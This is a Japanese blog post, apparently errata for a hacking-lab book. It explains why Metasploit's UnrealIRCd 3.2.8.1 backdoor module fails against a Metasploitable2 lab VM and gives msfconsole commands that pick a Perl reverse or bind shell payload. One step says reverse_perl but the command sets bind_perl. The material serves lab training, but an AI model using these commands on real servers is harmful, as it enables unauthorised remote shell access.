当サイトの一部ページには、アフィリエイト・アドセンス・アソシエイト・プロモーション広告を掲載しています。

Amazonのアソシエイトとして、Security Akademeiaは適格販売により収入を得ています。

広告配信等の詳細については、プライバシーポリシーページに掲載しています。

消費者庁が、2023年10月1日から施行する景品表示法の規制対象(通称:ステマ規制)にならないよう、配慮して記事を作成しています。もし問題のある表現がありましたら、問い合わせページよりご連絡ください。

参考:令和5年10月1日からステルスマーケティングは景品表示法違反となります。 | 消費者庁

UnrealIRCのバックドアに接続しようとしても失敗する

問題

P.398のステップ9にて、Metasploitable2のUnreal IRCのバックドアに接続する実験をしています。

本の手順通りに"exploit/unix/unreal_ircd_3281_backdoor"モジュールで攻撃しても、"Exploit failed"と表示されて失敗すると報告されました。

以前も問題なく実行できていたので、最新のKali(+Metasploit)でこの影響が出るようです。

原因

現在のMetasploitにはpayloadが自動で選択されてしまい、モジュールが想定するpayloadとマッチしていないとExploitコマンドを実行しても攻撃に失敗するようです。

対処方法

@nifox0408さんが対処方法を示してくれています。

現在のMetasploitにはpayloadが自動で選択されるようで、自分で適したペイロードを選択することで解決できるようです。

“cmd/unix/reverse_perl"を使う方法

1:P.401の通りに、"exploit/unix/unreal_ircd_3281_backdoor"モジュールを指定します。

msf > use unix/irc/unreal_ircd_3281_backdoor
msf exploit(unix/irc/unreal_ircd_3281_backdoor)> set RHOST 10.0.0.5

2:show payloadsで使えるペイロードの一覧を取得します。その中からそれらしいものを探します。

msf exploit(unix/irc/unreal_ircd_3281_backdoor)> show payloads

3:ここでは"cmd/unix/reverse_perl"を使うことにします。

show optionsで必要な設定を確認します。LHOSTやRHOSTSの設定が漏れていたらセットしてください。

msf exploit(unix/irc/unreal_ircd_3281_backdoor)> set payload cmd/unix/bind_perl
msf exploit(unix/irc/unreal_ircd_3281_backdoor)> show options

4:runコマンドを実行します。うまくいけばセッションが確立します。

プロンプトは返って来ませんが、idコマンドを実行すれば反応があるはずです。

“cmd/unix/bind_perl"を使う方法

上記の手順ではリバースシェルを使いましたが、バインドシェルでもうまくいくようです。

おわりに

ハッキング・ラボの情報をありがとうございます🙇‍♀️
そして情報展開が遅れてしまい申し訳ありませんでした。
いつかアップデートしたハッキング・ラボが登場する際にはきちんと反映したいと思っています。